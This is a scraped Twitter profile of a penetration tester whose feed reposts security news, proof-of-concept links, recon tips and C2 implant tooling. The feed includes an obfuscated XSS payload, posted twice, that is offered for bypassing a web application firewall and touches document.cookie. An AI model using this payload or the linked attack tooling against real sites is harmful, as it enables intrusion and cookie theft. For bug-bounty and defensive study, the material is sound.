Javier Olmedo (@jjavierolmedo) 's Twitter Profile
Javier Olmedo

@jjavierolmedo

👨‍💻 OSCP - OSWE | Pentester - Author hackpuntes.com blog

ID: 593075308

linkhttps://github.com/JavierOlmedo calendar_today28-05-2012 21:18:03

6,6K Tweet

1,1K Followers

1,1K Following

The Hacker News (@thehackersnews) 's Twitter Profile Photo

📄 You open a tax doc. 💻 Windows quietly loads malware. 🛑 Your AV dies. 💀 You’re owned. That’s how Winos 4.0 and HoldingHands RAT are spreading right now — using Windows’ own Task Scheduler against it. Details here ↓ thehackernews.com/2025/10/silver…

Andrea Pierini (@decoder_it) 's Twitter Profile Photo

Coercing machine authentication on Windows 11 /2025 using the MS-PRN/PrinterBug DCERPC edition, since named pipes are no longer used. Kerberos fails in this case due to a bad SPN from the spooler, forcing NTLM fallback.

Coercing machine authentication on Windows 11 /2025 using the MS-PRN/PrinterBug DCERPC edition, since named pipes are no longer used.
Kerberos fails in this case due to a bad SPN from the spooler, forcing NTLM fallback.
VIEH Group (@viehgroup) 's Twitter Profile Photo

Cross Site Scripting (XSS) Akamai WAF Bypass try this payload : <!--><svg+onload=%27top[%2fal%2f%2esource%2b%2fert%2f%2esource](document.cookie)%27> Credit: NullSecurityX #BugBounty #XSS #bugbountytips #infosec

Cross Site Scripting (XSS) Akamai WAF Bypass

try this payload : 
&lt;!--&gt;&lt;svg+onload=%27top[%2fal%2f%2esource%2b%2fert%2f%2esource](document.cookie)%27&gt;

Credit: <a href="/nullsecurityx/">NullSecurityX</a>
#BugBounty #XSS #bugbountytips #infosec
Dark Web Informer - Cyber Threat Intelligence (@darkwebinformer) 's Twitter Profile Photo

🚨PoC for SysAid PreAuth RCE Chain (CVE-2025-2775, CVE-2025-2776, CVE-2025-2777, CVE-2025-2778) GitHub: github.com/watchtowrlabs/… Write-up: labs.watchtowr.com/sysowned-your-…

VIEH Group (@viehgroup) 's Twitter Profile Photo

Cross Site Scripting (XSS) Akamai WAF Bypass try this payload : <!--><svg+onload=%27top[%2fal%2f%2esource%2b%2fert%2f%2esource](document.cookie)%27> #BugBounty #XSS #bugbountytips

Cross Site Scripting (XSS) Akamai WAF Bypass

try this payload :
&lt;!--&gt;&lt;svg+onload=%27top[%2fal%2f%2esource%2b%2fert%2f%2esource](document.cookie)%27&gt;

#BugBounty #XSS #bugbountytips
BleepingComputer (@bleepincomputer) 's Twitter Profile Photo

A new phishing technique dubbed 'CoPhish' weaponizes Microsoft Copilot Studio agents to deliver fraudulent OAuth consent requests via legitimate and trusted Microsoft domains. Microsoft told BleepingComputer they plan on fixing it in a future update. bleepingcomputer.com/news/security/…

ProjectDiscovery (@pdiscoveryio) 's Twitter Profile Photo

A DNS takeover is not the same as a subdomain takeover.  DNS takeovers have become a popular but often misunderstood vulnerability.  In this blog, you will learn: ✅ The difference between a DNS and subdomain takeover: A subdomain takeover exploits a service a domain points

A DNS takeover is not the same as a subdomain takeover. 

DNS takeovers have become a popular but often misunderstood vulnerability. 

In this blog, you will learn:

✅ The difference between a DNS and subdomain takeover: A subdomain takeover exploits a service a domain points
Panos Gkatziroulis 🦄 (@netbiosx) 's Twitter Profile Photo

GoDefender: Anti Virtulization, Anti Debugging, AntiVM, Anti Virtual Machine, Anti Debug, Anti Sandboxie, Anti Sandbox, VM Detect package github.com/EvilBytecode/G… #BlueTeam

Rasta Mouse (@_rastamouse) 's Twitter Profile Photo

[BLOG] The latest Crystal Palace update solved a big issue I had with merging raw assembly into PIC. I cover the new linkfunc command and the updated addhook command. rastamouse.me/pic-symphony/

Panos Gkatziroulis 🦄 (@netbiosx) 's Twitter Profile Photo

LibPicoManager - a unified PICO management framework designed as a Crystal Palace shared library for C2 implant development github.com/pard0p/LibPico…

Intigriti (@intigriti) 's Twitter Profile Photo

Google dorking is an effective recon method for discovering new hosts, paths & parameters! 🤠 Google Dorks for Bug Bounty is a list of the most common Google search queries to perform content discovery. It also comes with a tool to pre-fill your queries based on your target! 👀

Google dorking is an effective recon method for discovering new hosts, paths &amp; parameters! 🤠
 
Google Dorks for Bug Bounty is a list of the most common Google search queries to perform content discovery. It also comes with a tool to pre-fill your queries based on your target! 👀
Panos Gkatziroulis 🦄 (@netbiosx) 's Twitter Profile Photo

Agent for AdaptixC2 containing lateral movement capabilities (WMI, SCM, WinRM, DCOM), bof/dotnet/shellocde in memory executions, postex modules with shellcode and bof with possibilities of fork executions (spawn/explicit) github.com/entropy-z/Khar…